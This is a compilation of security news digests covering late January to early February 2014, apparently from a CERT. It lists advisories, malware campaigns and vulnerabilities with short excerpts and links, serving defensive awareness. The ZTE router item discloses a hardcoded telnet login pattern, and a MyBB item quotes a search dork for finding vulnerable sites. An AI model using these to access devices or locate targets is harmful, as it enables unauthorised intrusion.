Cybercriminals have an insatiable thirst for credit card data. There are multiple ways to steal this information on-line, but Point of Sales are the most tempting target. An estimated 60 percent of purchases at retailers' Point of Sale (POS) are paid for using a credit or debit card. Given that large retailers may process thousands of transactions daily through their POS, it stands to reason that POS terminals have come into the crosshairs of cybercriminals seeking large volumes of credit...
---------------------------------------------
http://www.symantec.com/connect/blogs/demystifying-point-sale-malware-and-a…
*** Malware Uses ZWS Compression for Evasion Tactic ***
---------------------------------------------
Cybercriminals can certainly be resourceful when it comes to avoiding detection. We have seen many instances wherein malware came equipped with improved evasion techniques, such as preventing execution of analysis tools, hiding from debuggers, blending in with normal network traffic, along with various JavaScript techniques. Security researchers have now come across malware that uses a legitimate compression technique to go unnoticed by security solutions.
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-uses-zws…
*** New Asprox Variant Goes Above and Beyond to Hijack Victims ***
---------------------------------------------
[UPDATE] After further analysis, this threat was identified as Asprox botnet and not Zbot
---------------------------------------------
http://research.zscaler.com/2014/02/new-zbot-variant-goes-above-and-beyond.…
*** OpenLDAP 2.4.36 Remote Users Deny Of Service ***
---------------------------------------------
Topic: OpenLDAP 2.4.36 Remote Users Deny Of Service Risk: Medium Text: It was discovered that OpenLDAP, with the rwm overlay to slapd, could segfault if a user were able to query the directory and i...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020032
*** Rockwell RSLogix 5000 Password Vulnerability ***
---------------------------------------------
OVERVIEW: This advisory was originally posted to the US-CERT secure Portal library on January 21, 2014, and is now being released to the NCCIC/ICS-CERT Web site. Independent researcher Stephen Dunlap has identified a password vulnerability in the Rockwell Automation RSLogix 5000 software. Rockwell Automation has produced a new version that mitigates this vulnerability.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-021-01
*** NETGEAR Router D6300B Telnet Backdoor Lets Remote Users Gain Root Access ***
---------------------------------------------
http://www.securitytracker.com/id/1029727
*** DSA-2855 libav ***
---------------------------------------------
several vulnerabilities
---------------------------------------------
http://www.debian.org/security/2014/dsa-2855
*** Security Bulletin: IBM Domino IMAP Server Denial of Service Vulnerability (CVE-2014-0822) ***
---------------------------------------------
The IMAP server in IBM Domino contains a denial of service vulnerability. A remote unauthenticated attacker could exploit this security vulnerability to cause a crash of the Domino server. The fix for this issue is available as a hotfix and is planned to be incorporated in all upcoming Interim Fixes, Fix Packs and Maintenance Releases.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21663023
*** Bugtraq: ESA-2014-005: EMC Documentum Foundation Services (DFS) Content Access Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530929
*** Vulnerabilities in Drupal Third-Party Modules ***
---------------------------------------------
https://drupal.org/node/2187453
https://drupal.org/node/2189509
https://drupal.org/node/2189643
https://drupal.org/node/2189751
*** WordPress WooCommerce SagePay Direct Payment Gateway Cross-Site Scripting Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56801
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 04-02-2014 18:00 − Wednesday 05-02-2014 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
*** WordPress Stop User Enumeration Plugin "author" User Enumeration Weakness ***
---------------------------------------------
Andrew Horton has discovered a weakness in the Stop User Enumeration plugin for WordPress, which can be exploited by malicious people to disclose certain sensitive information.
The weakness is caused due to an error when handling the "author" POST parameter, which can be exploited to enumerate valid usernames.
The weakness is confirmed in version 1.2.4. Other versions may also be affected.
---------------------------------------------
https://secunia.com/advisories/56643
*** Chrome Web Store Beset by Spammy Extensions ***
---------------------------------------------
Twelve seemingly legitimate Chrome browser extensions installed by more than 180,000 users are injecting advertisements on 44 popular websites.
---------------------------------------------
http://threatpost.com/chrome-web-store-beset-by-spammy-extensions/104031
*** Joomla! JomSocial Component Arbitrary Code Execution Vulnerability ***
---------------------------------------------
A vulnerability has been reported in the JomSocial component for Joomla!, which can be exploited by malicious people to compromise a vulnerable system.
---------------------------------------------
https://secunia.com/advisories/56692
*** New Zbot Variant Goes Above and Beyond to Hijack Victims ***
---------------------------------------------
Zbot is an extremely venomous threat, which has strong persistent tactics to ensure that the victim remains infected despite removal attempts. We will get to the overabundance of methods used to keep the victim infected later on.
---------------------------------------------
http://feedproxy.google.com/~r/zscaler/research/~3/ZKiYWwxWXJA/new-zbot-var…
*** Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer - Version: 19.0 ***
---------------------------------------------
The update addresses the vulnerabilities in Adobe Flash Player by updating the affected Adobe Flash libraries contained within Internet Explorer 10 and Internet Explorer 11.
---------------------------------------------
http://technet.microsoft.com/en-us/security/advisory/2755801
*** Cybercriminals release Socks4/Socks5 based Alexa PageRank boosting application ***
---------------------------------------------
A newly released, commercially available, DIY tool is pitching itself as being capable of boosting a given domain/list of domains on Alexa’s PageRank, relying on the syndication of Socks4/Socks5 malware-infected/compromised hosts through a popular Russian service.
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/VIunL9T8af4/
*** Embarrassing Hole in BlackBerry's Business Data Vault ***
---------------------------------------------
On the BlackBerry 10, a policy that is supposed to protect business contacts from access by personal apps fails. The vulnerability makes names and telephone numbers accessible to personal Android apps.
---------------------------------------------
http://www.heise.de/security/meldung/Peinliches-Loch-in-BlackBerrys-Geschae…
*** Standard Operational Procedures to manage multinational cyber-crises finalised by EU, EFTA Member States and ENISA ***
---------------------------------------------
Today, with the development of the EU-Standard Operational Procedures (EU-SOPs), a milestone has been reached for the management of multinational cyber crises. These procedures were developed by the EU and European Free Trade Association (EFTA) Member States in collaboration with the EU Agency ENISA.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/standard-operational-proced…
*** #Asusgate: Tens of Thousands of Routers Expose Private Files ***
---------------------------------------------
IP addresses of tens of thousands of vulnerable Asus routers have surfaced on the net. Under the title "#ASUSGATE", unknown persons also published lists of private files stored on attached USB devices.
---------------------------------------------
http://www.heise.de/security/meldung/Asusgate-Zehntausende-Router-geben-pri…
*** How to fail at Incident Response ***
---------------------------------------------
I'm a firm believer in having a sound incident response plan (and policies to go with it). One big piece of this is having a plan with regards to how the IR team should communicate. How should you communicate? Well, that's going to depend on your situation. But let me first answer the easier question: how you should not communicate.
---------------------------------------------
http://malwarejake.blogspot.se/2014/02/how-to-fail-at-incident-response.html
*** Blog: CVE-2014-0497 – a 0-day vulnerability ***
---------------------------------------------
A short while ago, we came across a set of similar SWF exploits and were unable to determine which vulnerability they exploited.
---------------------------------------------
http://www.securelist.com/en/blog/8177/CVE_2014_0497_a_0_day_vulnerability
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 03-02-2014 18:00 − Tuesday 04-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** New iFrame Injections Leverage PNG Image Metadata ***
---------------------------------------------
We're always trying to stay ahead of the latest trends, and today we caught a very interesting one that we have either been missing, or it's new. We'll just say it's new. We're all familiar with the idea of iFrame Injections, right? Understanding an iFrame Injection: The iFrame HTML tag is very standard today, it's...
---------------------------------------------
http://blog.sucuri.net/2014/02/new-iframe-injections-leverage-png-image-met…
*** These Guys Battled BlackPOS at a Retailer ***
---------------------------------------------
Ever since news broke that thieves stole more than 40 million debit and credit card accounts from Target using a strain of Point-Of-Sale malware known as BlackPOS, much speculation has swirled around unanswered questions, such as how this malware was introduced into the network, and what mechanisms were used to infect thousands of Target's cash registers.
---------------------------------------------
http://krebsonsecurity.com/2014/02/these-guys-battled-blackpos-at-a-retaile…
*** Search Engines for OSINT and Recon ***
---------------------------------------------
Based on the title to this post, you're thinking, "Awesome, Dave! Welcome to 2006!" Well hang on there. There's an amazing number of awesome search facilities that can be useful when doing OSINT and recon work for pen testing. I'll list a lot of different sites that I have discovered and use regularly for both.
---------------------------------------------
http://daveshackleford.com/?p=999
*** Defending Against Tor-Using Malware, Part 2 ***
---------------------------------------------
Last week, we talked about what Tor is, how it works, and why system administrators need to be aware of it. Now the question is: should I block Tor, and if I do decide to do that, what can be done to block Tor? Tor, by itself, is not inherently malicious. If a user wants...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/njzW9v7v14w/
*** VU#228886: ZTE ZXV10 W300 router contains hardcoded credentials ***
---------------------------------------------
Vulnerability Note VU#228886 ZTE ZXV10 W300 router contains hardcoded credentials
Original Release date: 03 Feb 2014 | Last revised: 03 Feb 2014
Overview: ZTE ZXV10 W300 router version 2.1.0, and possibly earlier versions, contains hardcoded credentials. (CWE-798)
Description: ZTE ZXV10 W300 router contains hardcoded credentials that are usable for the telnet service on the device. The username is "admin" and the password is "XXXXairocon" where "XXXX" is the last...
---------------------------------------------
http://www.kb.cert.org/vuls/id/228886
*** VU#593118: Fortinet Fortiweb 5.0.3 contains a reflected cross-site scripting vulnerability ***
---------------------------------------------
Vulnerability Note VU#593118 Fortinet Fortiweb 5.0.3 contains a reflected cross-site scripting vulnerability
Original Release date: 03 Feb 2014 | Last revised: 03 Feb 2014
Overview: Fortinet Fortiweb 5.0.3, and possibly earlier versions, contains a cross-site scripting vulnerability. (CWE-79)
Description: CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting). Fortinet Fortiweb 5.0.3, and possibly earlier versions, contains a cross-site scripting...
---------------------------------------------
http://www.kb.cert.org/vuls/id/593118
*** VU#728638: Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability ***
---------------------------------------------
Vulnerability Note VU#728638 Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability
Original Release date: 03 Feb 2014 | Last revised: 03 Feb 2014
Overview: Fortinet FortiOS 5.0.5, and possibly earlier versions, contains a cross-site scripting vulnerability. (CWE-79)
Description: CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting). Fortinet FortiOS 5.0.5, and possibly earlier versions, contains a cross-site scripting...
---------------------------------------------
http://www.kb.cert.org/vuls/id/728638
*** VU#813382: Dell KACE K1000 management appliance contains a cross-site scripting vulnerability ***
---------------------------------------------
Vulnerability Note VU#813382 Dell KACE K1000 management appliance contains a cross-site scripting vulnerability
Original Release date: 04 Feb 2014 | Last revised: 04 Feb 2014
Overview: Dell KACE K1000 management appliance version 5.5.90545, and possibly earlier versions, contains a cross-site scripting (XSS) vulnerability. (CWE-79)
Description: Dell KACE K1000 management appliance version 5.5.90545, and possibly earlier versions, contains a cross-site scripting (XSS) vulnerability. The
---------------------------------------------
http://www.kb.cert.org/vuls/id/813382
*** Security Bulletins: Vulnerability in Citrix XenMobile Device Manager server, formerly known as Zenprise Device Manager server, could result in unauthenticated information disclosure ***
---------------------------------------------
A vulnerability in Citrix XenMobile Device Manager server, formerly known as Zenprise Device Manager server, that could allow a remote, unauthenticated attacker to gain access to stored data.
---------------------------------------------
http://support.citrix.com/article/CTX140044
*** MyBB 1.6.12 POST Cross Site Scripting ***
---------------------------------------------
Topic: MyBB 1.6.12 POST Cross Site Scripting Risk: Low Text: <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2n...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020018
*** Chrony chronyc Protocol Response Amplification Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56727
*** mpg123 MP3 Decoding Buffer Overflow Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56729
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 31-01-2014 18:00 − Monday 03-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Telephony Abuse Apparently Not a Mass Hack of AVM's Fritzboxes ***
---------------------------------------------
In recent days some Fritzbox users were surprised by high, sometimes exorbitant telephone charges. Behind this are apparently attacks on the remote configuration of the Fritzboxes in question using known access credentials.
---------------------------------------------
http://www.heise.de/security/meldung/Telefonie-Missbrauch-anscheinend-kein-…
*** Hackers Use a Trick to Deliver Zeus Banking Malware ***
---------------------------------------------
IDG News Service - Hackers found a new way to slip past security software and deliver Zeus, a long-known malicious software program that steals online banking details. Security company Malcovery Security, based in Georgia, alerted security analysts after finding that none of 50 security programs on Google's online virus scanning service VirusTotal were catching it as of early Sunday.
---------------------------------------------
http://www.cio.com/article/747601/Hackers_Use_a_Trick_to_Deliver_Zeus_Banki…
*** More than a million Android devices infected with bootkit trojan ***
---------------------------------------------
More than a million Android mobile devices worldwide are now infected with a crafty bootkit trojan known as Android.Oldboot.1.origin - a number that has more than tripled in a week.
---------------------------------------------
http://www.scmagazine.com//more-than-a-million-android-devices-infected-wit…
*** DailyMotion Still Infected, Serving Fake AV Malware ***
---------------------------------------------
DailyMotion, one of the most popular websites on the Web, is still serving fake AV malware three weeks after it was notified of a compromise.
---------------------------------------------
http://threatpost.com/dailymotion-still-infected-serving-fake-av-malware/10…
*** SSA-342587 (Last Update 2014-02-03): Vulnerabilities in SIMATIC WinCC Open Architecture ***
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** VU#250358: Various Inmarsat broadband satellite terminals contain multiple vulnerabilities ***
---------------------------------------------
A number of broadband satellite terminals which utilize the Inmarsat satellite telecommunications network have been found to contain undocumented hardcoded login credentials (CWE-798). Additionally, these broadband satellite terminals utilize an insecure proprietary communications protocol that allows...
---------------------------------------------
http://www.kb.cert.org/vuls/id/250358
*** DSA-2851 drupal6 ***
---------------------------------------------
impersonation
---------------------------------------------
http://www.debian.org/security/2014/dsa-2851
*** IBM Financial Transaction Manager multiple vulnerabilities ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90584
http://xforce.iss.net/xforce/xfdb/90585
http://xforce.iss.net/xforce/xfdb/90586
http://xforce.iss.net/xforce/xfdb/90612
*** Security Bulletin: Cross-Site Request Forgery in IBM InfoSphere Master Data Management - Collaborative Edition (CVE-2013-5427) ***
---------------------------------------------
Due to insufficient safeguards against cross-site request forgery, an attacker can trick a legitimate user into opening a URL that results in an action being taken as that user, potentially without the knowledge of that user. Any actions taken require that the legitimate user be already authenticated or to authenticate separately as part of the attack.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21663181
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 30-01-2014 18:00 − Friday 31-01-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Researcher Warns of Critical Flaws in Oracle Servers ***
---------------------------------------------
There are two vulnerabilities in some of Oracle's older database packages that allow an attacker to access a remote server without a password and even view the server's filesystem and dump arbitrary files. Oracle has not released a patch for one of the flaws, even though it was reported by a researcher more than two...
---------------------------------------------
http://threatpost.com/researcher-warns-of-critical-flaws-in-oracle-servers/…
*** Linux: Security hole in x32 code ***
---------------------------------------------
A security hole in the Linux kernel allows users to write to arbitrary memory areas. Only kernels with support for x32 code are affected; in Ubuntu this support is enabled by default.
---------------------------------------------
http://www.golem.de/news/linux-sicherheitsluecke-in-x32-code-1401-104300-rs…
*** Yahoo! Mail! users! change! your! passwords! NOW! ***
---------------------------------------------
Web giant blames third-party database compromise. Yahoo! is urging users of its Mail service to change their passwords to something secure and unique to the web giant - after a security breach exposed account login details to theft.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/01/31/yahoo_mail_…
*** Akamai Releases Third Quarter, 2013 State of the Internet Report ***
---------------------------------------------
Akamai Technologies, Inc. (NASDAQ: AKAM), the leading provider of cloud services for delivering, optimizing and securing online content and business applications, today released its Third Quarter, 2013 State of the Internet Report. Based on data gathered from the Akamai Intelligent Platform, the report provides insight into key global statistics such as network connectivity and connection speeds, attack traffic, and broadband adoption and availability, among many others.
---------------------------------------------
http://www.akamai.com/html/about/press/releases/2014/press_012814.html
*** Chewbacca Point-of-Sale Malware Campaign Found in 10 Countries ***
---------------------------------------------
A criminal campaign using the Tor-based Chewbacca Trojan, which includes memory-scraping malware and a keylogger, is responsible for the theft of more than 49,000 credit card numbers in 10 countries.
---------------------------------------------
http://threatpost.com/chewbacca-point-of-sale-malware-campaign-found-in-10-…
*** 3S CoDeSys Runtime Toolkit NULL Pointer Dereference ***
---------------------------------------------
Independent researcher Nicholas Miles has identified a NULL pointer dereference vulnerability in Smart Software Solutions (3S) CoDeSys Runtime Toolkit application. 3S has produced an update that mitigates this vulnerability. Nicholas Miles has tested the update to validate that it resolves the vulnerability. This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-030-01
*** Schneider Electric Telvent SAGE RTU DNP3 Improper Input Validation Vulnerability ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure portal library on January 06, 2014, and is now being released to the NCCIC/ICS-CERT Web site. Adam Crain of Automatak and independent researchers Chris Sistrunk and Adam Todorski have identified an improper input validation in the Schneider Electric Telvent SAGE 3030 remote terminal unit (RTU). Schneider Electric has produced a patch that mitigates this vulnerability. This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-006-01
*** Moodle - MSA-14-0002: Group constraints lacking in "login as" ***
---------------------------------------------
Users were able to log in as a user who is not in the same group, without having the permission to see all groups.
---------------------------------------------
https://moodle.org/mod/forum/discuss.php?d=252415
*** TYPO3-PSA-2014-001: Cross-Site Request Forgery Protection in TYPO3 CMS 6.2 ***
---------------------------------------------
In TYPO3 CMS, protection against CSRF has been implemented for many important actions (like creating, editing or deleting records) but is still missing in other places (like the Extension Manager, file upload and the configuration module). The upcoming 6.2 LTS version will finally close this gap and will protect editors and administrators from these kinds of attacks.
---------------------------------------------
https://typo3.org/teams/security/security-bulletins/psa/typo3-psa-2014-001/
*** Puppet - CVE-2013-6450 - Potential denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. ***
---------------------------------------------
The DTLS retransmission implementation in OpenSSL through 0.9.8y and 1.x through 1.0.1e does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context by interfering with packet delivery, related...
---------------------------------------------
http://puppetlabs.com/security/cve/cve-2013-6450
*** VU#108062: Lexmark laser printers contain multiple vulnerabilities ***
---------------------------------------------
Certain Lexmark devices are vulnerable to unverified password changes and stored cross-site scripting attacks.
---------------------------------------------
http://www.kb.cert.org/vuls/id/108062
*** A10 Networks Loadbalancer GET directory traversal ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90814
*** Check Point Endpoint Security MI Server Certificate Validation Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1029704
*** Bugtraq: [SECURITY] [DSA 2849-1] curl security update ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530910
*** Bugtraq: Joomla! JomSocial component < 3.1.0.1 - Remote code execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530909
*** Joomla! JV Comment Component "id" SQL Injection Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56588
*** Vuln: OpenStack Compute (Nova) Compressed qcow2 Disk Images Denial of Service Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/63467
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 29-01-2014 18:00 − Thursday 30-01-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** New Clues in the Target Breach ***
---------------------------------------------
An examination of the malware used in the Target breach suggests that the attackers may have taken advantage of a poorly secured feature built into a widely-used IT management software product that was running on the retailer's internal network.
---------------------------------------------
http://krebsonsecurity.com/2014/01/new-clues-in-the-target-breach/
*** How to Debug DKIM, (Wed, Jan 29th) ***
---------------------------------------------
DKIM is one way to make it easier for other servers to figure out if an e-mail sent on behalf of your domain is spoofed. Your mail server will add a digital signature to each email authenticating the source. This isn't as good as signing the entire e-mail, but it is a useful tool to at least validate the domain used as part of the "From" header. The problem is that DKIM can be tricky to debug. If you have mail rejected, it is useful to be able to manually verify what went wrong. For
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17528
*** Honey Encryption Tricks Hackers with Decryption Deception ***
---------------------------------------------
Honey Encryption is an encryption tool in the works that fools an attacker with bogus decrypted data that looks like it could be a plausible guess at an encryption key or password.
---------------------------------------------
http://threatpost.com/honey-encryption-tricks-hackers-with-decryption-decep…
*** Attacker extorts coveted Twitter username in elaborate social engineering scheme ***
---------------------------------------------
Naoki Hiroshima recently relinquished to an attacker a prized possession that he owned since 2007: a very rare Twitter username so coveted that not only have people tried to steal it, but one person offered $50,000 for it.
---------------------------------------------
http://www.scmagazine.com//attacker-extorts-coveted-twitter-username-in-ela…
*** Security 101 fail: 3G/4G modems expose control panels to hackers ***
---------------------------------------------
Embedded kit depressingly riddled with cross-site request forgery vulns, says researcher. Vulnerabilities in a number of 3G and 4G USB modems can be exploited to steal login credentials - or rack up victims' mobile bills by sending text messages to premium-rate numbers - a security researcher warns.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/01/30/3gmodem_sec…
*** Energy: cyber security is crucial for protection against threats for smart grids which are key for energy availability claims EU cyber security Agency in new report ***
---------------------------------------------
The EU's cyber security agency ENISA signals that assessing the threats for smart grids is crucial for their protection and is therefore a key element in ensuring energy availability.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/energy-cyber-security-is-cr…
*** Code injection through MediaWiki hole ***
---------------------------------------------
The popular wiki software has a critical hole through which attackers can compromise the server. Patched versions provide a remedy.
---------------------------------------------
http://www.heise.de/security/meldung/Code-Einschleusung-durch-MediaWiki-Lue…
*** Windows task manager Process Explorer 16 with VirusTotal integration ***
---------------------------------------------
The newly released version 16 of Process Explorer queries the web-based multi-scanner VirusTotal on request. There, around 50 virus scanners check whether a file is dangerous.
---------------------------------------------
http://www.heise.de/security/meldung/Windows-Taskmanager-Process-Explorer-1…
*** Critical infrastructure hack data found in public domain ***
---------------------------------------------
Data available from mainstream online media - such as blogs, social networking websites, and specialist online publications - could be used by malevolent agents to mount a cyber-attack on UK critical national infrastructure (CNI), the findings of an investigative assessment to be presented next week will warn.
---------------------------------------------
http://eandt.theiet.org/news/2014/jan/ics-security.cfm
*** Pidgin Multiple Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been reported in Pidgin, which can be exploited by malicious people to compromise a user's system.
---------------------------------------------
https://secunia.com/advisories/56693
*** Bugtraq: SimplyShare v1.4 iOS - Multiple Web Vulnerabilities ***
---------------------------------------------
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official SimplyShare v1.4 iOS mobile application.
---------------------------------------------
http://www.securityfocus.com/archive/1/530906
*** OTRS Security Advisory 2014-01 - CSRF issue in customer web interface ***
---------------------------------------------
An attacker that managed to take over the session of a logged in customer could create tickets and/or send follow-ups to existing tickets due to missing challenge token checks.
---------------------------------------------
https://www.otrs.com/security-advisory-2014-01-csrf-issue-customer-web-inte…
*** OTRS Security Advisory 2014-02 - SQL injection issue ***
---------------------------------------------
Affected by this vulnerability are all releases of OTRS 3.1.x up to and including 3.1.18, 3.2.x up to and including 3.2.13 and 3.3.x up to and including 3.3.3.
---------------------------------------------
https://www.otrs.com/security-advisory-2014-02-sql-injection-issue/
*** VLC Media Player RTSP Processing "parseRTSPRequestString()" Buffer Overflow Vulnerability ***
---------------------------------------------
A vulnerability has been discovered in VLC Media Player, which can be exploited by malicious people to compromise a user's system.
---------------------------------------------
https://secunia.com/advisories/56676
*** SA-CONTRIB-2014-007 - Services - Multiple access bypass vulnerabilities ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-007
Project: Services (third-party module)
Version: 7.x
Date: 2014-January-29
Security risk: Highly critical
Exploitable from: Remote
Vulnerability: Multiple access bypass vulnerabilities
Description
This module enables you to expose an API to third party systems using REST, XML-RPC or other protocols. The form API provides a method for developers to submit forms programmatically using the function drupal_form_submit(). During programmatic form submissions, all access...
---------------------------------------------
https://drupal.org/node/2184843
*** SA-CONTRIB-2014-008 - Tribune - Cross Site Scripting (XSS) ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-008
Project: Tribune (third-party module)
Version: 6.x, 7.x
Date: 2014-January-29
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Cross Site Scripting
Description
A tribune is a type of chatroom. The module doesn't sufficiently filter user-provided text from Tribune node titles. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create a Tribune node.
---------------------------------------------
https://drupal.org/node/2184845
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 28-01-2014 18:00 − Wednesday 29-01-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Introducing ModSecurity Status Reporting ***
---------------------------------------------
The Trustwave SpiderLabs Research team is committed to making ModSecurity the best open source WAF possible. To this end, we have deployed Buildbot platforms and revamped regression tests for our different ports to ensure code quality and reliability. But we want to take it even further. The question is, how else can we improve ModSecurity development and support? To best answer that question, we need some basic insight into the ModSecurity user community: How many ModSecurity deployments are...
---------------------------------------------
http://blog.spiderlabs.com/2014/01/introducing-modsecurity-status-reporting…
*** Defending Against Tor-Using Malware, Part 1 ***
---------------------------------------------
In the past few months, the Tor anonymity service has been in the news for various reasons. Perhaps most infamously, it was used by the now-shuttered Silk Road underground marketplace. We delved into the topic of the Deep Web in a white paper titled Deepweb and Cybercrime. In our 2014 predictions, we noted that cybercriminals would go deeper...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/F4F76IP9KP8/
*** Eyeing SpyEye ***
---------------------------------------------
Earlier this week, it was announced by the United States Department of Justice that the creator of the notorious SpyEye banking malware, Aleksandr Andreevich Panin (also known as Gribodemon or Harderman), had pleaded guilty before a federal court to charges related to creating and distributing SpyEye. Trend Micro was a key part of this investigation...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/4eIEz-KJvXo/
*** This tool demands access to YOUR ENTIRE DIGITAL LIFE. Is it from GCHQ? No - it's by IKEA ***
---------------------------------------------
Order a flat-pack kitchen, surrender your HDD's contents. If the Target hack - along with all its predecessors - taught us anything, it's that the database isn't the vulnerability. It's the data that's the problem.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/01/29/ikea_demand…
*** Botnet exploits hole in old Java versions ***
---------------------------------------------
Security experts have discovered malware that exploits a Java hole closed months ago in order to build a botnet. The program runs on Windows, Linux and Mac OS X; a remedy is easily available.
---------------------------------------------
http://www.heise.de/security/meldung/Botnetz-nutzt-Luecke-in-alten-Java-Ver…
*** Cisco Network Time Protocol Distributed Reflective Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the Network Time Protocol (NTP) package of several Cisco products could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013…
*** Cisco Identity Services Engine Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** WordPress WebEngage Plugin Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been discovered in the WebEngage plugin for WordPress, which can be exploited by malicious people to conduct cross-site scripting attacks.
---------------------------------------------
https://secunia.com/advisories/56700
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 27-01-2014 18:00 − Tuesday 28-01-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Making Your Printer Say "Feed Me a Kitten" and Also Exfiltrate Sensitive Data ***
---------------------------------------------
As of this last release, PJL (HP's Printer Job Language) is now a grown-up Rex::Proto protocol! Since extending a protocol in Metasploit is beyond the scope of this post, we'll just be covering how to use the PoC modules included with the new protocol. Feel free to dig around in lib/rex/proto/pjl*, though!
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/01/23/hacking-p…
*** Coordinated malware eradication ***
---------------------------------------------
Today, as an industry, we are very effective at disrupting malware families, but those disruptions rarely eradicate them. Instead, the malware families linger on, rearing up again and again to wreak havoc on our customers. To change the game, we need to change the way we work. It is counterproductive when you think about it. The antimalware ecosystem encompasses many strong groups: security vendors, service providers, CERTs, anti-fraud departments, and law enforcement. Each group uses their...
---------------------------------------------
https://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-…
*** Trustworthy electronic signatures, secure e-Government and trust: the way forward for improving EU citizens' trust in web services, outlined by EU Agency ENISA ***
---------------------------------------------
The EU's cyber security Agency, ENISA, is publishing a series of new studies about the current security practices of Trust Service Providers (TSPs) and recommendations for improving cross-border trustworthiness and interoperability for the new regulated TSPs and for e-Government services using them.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/trustworthy-electronic-sign…
*** Android VPN redirect vuln now spotted lurking in Kitkat 4.4 ***
---------------------------------------------
Now may be a good time to check this out, says securo-bod. Israeli researchers who specialise in ferreting out Android vulns have discovered a new flaw in KitKat 4.4 that allows an attacker to redirect secure VPN traffic to a third-party server.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/01/28/android_vpn…
*** File Infectors and ZBOT Team Up, Again ***
---------------------------------------------
File infectors and ZBOT don't usually go together, but we recently saw a case where these two kinds of threats did. This particular file infector - PE_PATNOTE.A - appends its code to all executable files on the infected system,...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/n_0oP1-kYzo/
*** Login theft: warning about manipulated Filezilla client ***
---------------------------------------------
Avast warns of manipulated program versions of the popular Filezilla client. Anyone using the bogus version of the FTP program hands criminals the access credentials for the FTP servers they use. Only users who downloaded Filezilla from the wrong source are affected.
---------------------------------------------
http://www.golem.de/news/login-diebstahl-warnung-vor-manipuliertem-filezill…
*** Blog: A cross-platform java-bot ***
---------------------------------------------
Early this year, we received a malicious Java application for analysis, which turned out to be a multi-platform bot capable of running on Windows, Mac OS and Linux. The bot was written entirely in Java. The attackers used vulnerability CVE-2013-2465 to infect users with the malware.
---------------------------------------------
